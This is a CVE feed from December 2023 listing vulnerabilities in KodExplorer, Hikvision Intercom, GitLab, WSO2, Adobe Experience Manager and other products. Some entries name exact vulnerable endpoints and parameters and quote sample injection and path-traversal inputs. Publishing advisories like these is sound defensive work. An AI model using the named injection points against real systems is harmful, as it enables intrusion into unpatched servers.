Vulnerability ID : CVE-2023-6850

First published on : 16-12-2023 09:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6850
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6 | source : cna@vuldb.com
https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01 | source : cna@vuldb.com
https://note.zhaoj.in/share/L38RNzUOwOtN | source : cna@vuldb.com
https://vuldb.com/?ctiid.248218 | source : cna@vuldb.com
https://vuldb.com/?id.248218 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-6851

First published on : 16-12-2023 11:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219.

CVE ID : CVE-2023-6851
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6 | source : cna@vuldb.com
https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01 | source : cna@vuldb.com
https://note.zhaoj.in/share/D44UjzoFXYfi | source : cna@vuldb.com
https://vuldb.com/?ctiid.248219 | source : cna@vuldb.com
https://vuldb.com/?id.248219 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-6852

First published on : 16-12-2023 12:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.

CVE ID : CVE-2023-6852
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6 | source : cna@vuldb.com
https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01 | source : cna@vuldb.com
https://note.zhaoj.in/share/P6lQNyqQn3zY | source : cna@vuldb.com
https://vuldb.com/?ctiid.248220 | source : cna@vuldb.com
https://vuldb.com/?id.248220 | source : cna@vuldb.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-6853

First published on : 16-12-2023 12:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability.

CVE ID : CVE-2023-6853
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6 | source : cna@vuldb.com
https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01 | source : cna@vuldb.com
https://note.zhaoj.in/share/oaYHbDTnPiU3 | source : cna@vuldb.com
https://vuldb.com/?ctiid.248221 | source : cna@vuldb.com
https://vuldb.com/?id.248221 | source : cna@vuldb.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-6887

First published on : 17-12-2023 01:15:27
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247.

CVE ID : CVE-2023-6887
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/daydust/vuln/blob/main/ForestBlog/Arbitrary_File_Upload_Vulnerability.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248247 | source : cna@vuldb.com
https://vuldb.com/?id.248247 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-6888

First published on : 17-12-2023 01:15:27
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6888
Source : cna@vuldb.com
CVSS Score : 6.3

References :
http://www.huiyao.love/2023/12/08/rtspserver-stackoverflow-vulnerability/ | source : cna@vuldb.com
https://github.com/hu1y40/PoC/blob/main/rtspserver_stackoverflow_poc.py | source : cna@vuldb.com
https://vuldb.com/?ctiid.248248 | source : cna@vuldb.com
https://vuldb.com/?id.248248 | source : cna@vuldb.com

Vulnerability : CWE-121


Vulnerability ID : CVE-2023-6895

First published on : 17-12-2023 08:15:07
Last modified on : 18-12-2023 15:15:10

Description :
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6895
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/willchen0011/cve/blob/main/rce.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248254 | source : cna@vuldb.com
https://vuldb.com/?id.248254 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2023-6885

First published on : 16-12-2023 23:15:40
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6885
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/Martinzb/cve/blob/main/sql.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248245 | source : cna@vuldb.com
https://vuldb.com/?id.248245 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-6898

First published on : 17-12-2023 11:15:08
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256.

CVE ID : CVE-2023-6898
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/Glunko/gaatitrack-courier-management-system_vulnerability/blob/main/sql_injection.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248256 | source : cna@vuldb.com
https://vuldb.com/?id.248256 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-6902

First published on : 17-12-2023 16:15:13
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260.

CVE ID : CVE-2023-6902
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/g1an123/POC/blob/main/Unauthorized%20file%20upload%20getshell.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248260 | source : cna@vuldb.com
https://vuldb.com/?id.248260 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-6907

First published on : 18-12-2023 04:15:51
Last modified on : 18-12-2023 14:05:17

Description :
A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability.

CVE ID : CVE-2023-6907
Source : cna@vuldb.com
CVSS Score : 5.4

References :
https://github.com/g1an123/POC/blob/main/Unauthorized%20file%20deletion.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248269 | source : cna@vuldb.com
https://vuldb.com/?id.248269 | source : cna@vuldb.com

Vulnerability : CWE-287


Vulnerability ID : CVE-2023-6891

First published on : 17-12-2023 04:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release.

CVE ID : CVE-2023-6891
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://peazip.github.io/changelog.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.248251 | source : cna@vuldb.com
https://vuldb.com/?id.248251 | source : cna@vuldb.com

Vulnerability : CWE-427


Vulnerability ID : CVE-2023-6886

First published on : 17-12-2023 01:15:27
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6886
Source : cna@vuldb.com
CVSS Score : 4.7

References :
https://github.com/xnx3/wangmarket/issues/8 | source : cna@vuldb.com
https://vuldb.com/?ctiid.248246 | source : cna@vuldb.com
https://vuldb.com/?id.248246 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-6900

First published on : 17-12-2023 14:15:36
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6900
Source : cna@vuldb.com
CVSS Score : 4.6

References :
https://treasure-blarney-085.notion.site/DashMachine-Arbitrary-File-Deletion-ab44f2fe68e843c393ae9e0c1d487676 | source : cna@vuldb.com
https://vuldb.com/?ctiid.248258 | source : cna@vuldb.com
https://vuldb.com/?id.248258 | source : cna@vuldb.com

Vulnerability : CWE-24


Vulnerability ID : CVE-2023-6893

First published on : 17-12-2023 07:15:07
Last modified on : 18-12-2023 15:15:10

Description :
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252.

CVE ID : CVE-2023-6893
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://github.com/willchen0011/cve/blob/main/download.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248252 | source : cna@vuldb.com
https://vuldb.com/?id.248252 | source : cna@vuldb.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-6894

First published on : 17-12-2023 08:15:06
Last modified on : 18-12-2023 15:15:10

Description :
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability.

CVE ID : CVE-2023-6894
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://github.com/willchen0011/cve/blob/main/unaccess.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248253 | source : cna@vuldb.com
https://vuldb.com/?id.248253 | source : cna@vuldb.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2023-6899

First published on : 17-12-2023 13:15:42
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability.

CVE ID : CVE-2023-6899
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://treasure-blarney-085.notion.site/DashMachine-Unauthorized-RCE-931a35a81af9448ebe9fb4cd904d4a0c | source : cna@vuldb.com
https://vuldb.com/?ctiid.248257 | source : cna@vuldb.com
https://vuldb.com/?id.248257 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-6904

First published on : 17-12-2023 23:15:44
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6904
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://vuldb.com/?ctiid.248266 | source : cna@vuldb.com
https://vuldb.com/?id.248266 | source : cna@vuldb.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-6905

First published on : 18-12-2023 00:15:11
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6905
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://vuldb.com/?ctiid.248267 | source : cna@vuldb.com
https://vuldb.com/?id.248267 | source : cna@vuldb.com

Vulnerability : CWE-90


Source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability ID : CVE-2023-6838

First published on : 15-12-2023 10:15:10
Last modified on : 15-12-2023 13:41:51

Description :
A reflected XSS vulnerability can be exploited by tampering with a request parameter in the Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests.

CVE ID : CVE-2023-6838
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 6.1

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1233/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6839

First published on : 15-12-2023 11:15:48
Last modified on : 15-12-2023 13:41:51

Description :
Due to improper error handling, a REST API resource could expose a server-side error containing an internal WSO2-specific package name in the HTTP response.

CVE ID : CVE-2023-6839
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 5.3

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1334/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-209


Vulnerability ID : CVE-2023-6911

First published on : 18-12-2023 09:15:05
Last modified on : 18-12-2023 14:05:17

Description :
Multiple WSO2 products have been identified as vulnerable due to improper output encoding: a Stored Cross-Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console.

CVE ID : CVE-2023-6911
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 4.8

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1225/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6836

First published on : 15-12-2023 10:15:09
Last modified on : 15-12-2023 13:41:51

Description :
Multiple WSO2 products have been identified as vulnerable to an XML External Entity (XXE) attack, which abuses a widely available but rarely used feature of XML parsers to access sensitive information.

CVE ID : CVE-2023-6836
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 4.6

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-0716/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-611


Vulnerability ID : CVE-2023-6835

First published on : 15-12-2023 10:15:09
Last modified on : 15-12-2023 13:42:13

Description :
Multiple WSO2 products have been identified as vulnerable: due to a lack of server-side input validation in the Forum feature, API rating could be manipulated.

CVE ID : CVE-2023-6835
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 4.3

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2021-1357/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-20


Source : bosch.com

Vulnerability ID : CVE-2023-35867

First published on : 18-12-2023 13:15:07
Last modified on : 18-12-2023 14:05:17

Description :
Improper handling of malformed API answer packets sent to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability, an attacker has to replace an existing API server, e.g. through Man-in-the-Middle attacks.

CVE ID : CVE-2023-35867
Source : psirt@bosch.com
CVSS Score : 5.9

References :
https://psirt.bosch.com/security-advisories/BOSCH-SA-092656-BT.html | source : psirt@bosch.com

Vulnerability : CWE-703


Vulnerability ID : CVE-2022-41677

First published on : 18-12-2023 13:15:06
Last modified on : 18-12-2023 14:05:17

Description :
An information disclosure vulnerability was discovered in Bosch IP camera devices, allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and the network settings of the device, possibly disclosing internal network settings if the device is connected to the internet.

CVE ID : CVE-2022-41677
Source : psirt@bosch.com
CVSS Score : 5.3

References :
https://psirt.bosch.com/security-advisories/bosch-sa-839739-BT.html | source : psirt@bosch.com

Vulnerability : CWE-284


Source : silabs.com

Vulnerability ID : CVE-2023-5310

First published on : 15-12-2023 16:15:46
Last modified on : 15-12-2023 16:53:06

Description :
A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device.

CVE ID : CVE-2023-5310
Source : product-security@silabs.com
CVSS Score : 5.7

References :
https://github.com/SiliconLabs/gecko_sdk/releases | source : product-security@silabs.com
https://siliconlabs.lightning.force.com/sfc/servlet.shepherd/document/download/069Vm0000005E7EIAU?%20operationContext=S1 | source : product-security@silabs.com

Vulnerability : CWE-754


Source : gitlab.com

Vulnerability ID : CVE-2023-6051

First published on : 15-12-2023 16:15:46
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag.

CVE ID : CVE-2023-6051
Source : cve@gitlab.com
CVSS Score : 5.7

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/431345 | source : cve@gitlab.com
https://hackerone.com/reports/2237165 | source : cve@gitlab.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-3907

First published on : 17-12-2023 23:15:43
Last modified on : 18-12-2023 14:05:22

Description :
A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner.

CVE ID : CVE-2023-3907
Source : cve@gitlab.com
CVSS Score : 4.9

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/418878 | source : cve@gitlab.com
https://hackerone.com/reports/2058934 | source : cve@gitlab.com

Vulnerability : CWE-269


Vulnerability ID : CVE-2023-5512

First published on : 15-12-2023 16:15:46
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names, leading to incorrect representation in the UI.

CVE ID : CVE-2023-5512
Source : cve@gitlab.com
CVSS Score : 4.8

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/427827 | source : cve@gitlab.com
https://hackerone.com/reports/2194607 | source : cve@gitlab.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-3904

First published on : 15-12-2023 16:15:43
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab EE affecting all versions before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue, which altered the details shown in the issue boards.

CVE ID : CVE-2023-3904
Source : cve@gitlab.com
CVSS Score : 4.3

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/418226 | source : cve@gitlab.com
https://hackerone.com/reports/2053154 | source : cve@gitlab.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2023-5061

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API.

CVE ID : CVE-2023-5061
Source : cve@gitlab.com
CVSS Score : 4.3

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/425521 | source : cve@gitlab.com
https://hackerone.com/reports/2125189 | source : cve@gitlab.com

Vulnerability : CWE-285


Source : adobe.com

Vulnerability ID : CVE-2023-47064

First published on : 15-12-2023 11:15:09
Last modified on : 18-12-2023 18:47:57

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-47064
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-47065

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:47:46

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-47065
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48440

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:47:36

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48440
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48442

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:47:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48442
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48443

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:46:50

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48443
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48444

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:19:44

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48444
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48445

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:19:36

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48445
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48446

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:19:29

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48446
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48447

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:18:38

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48447
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

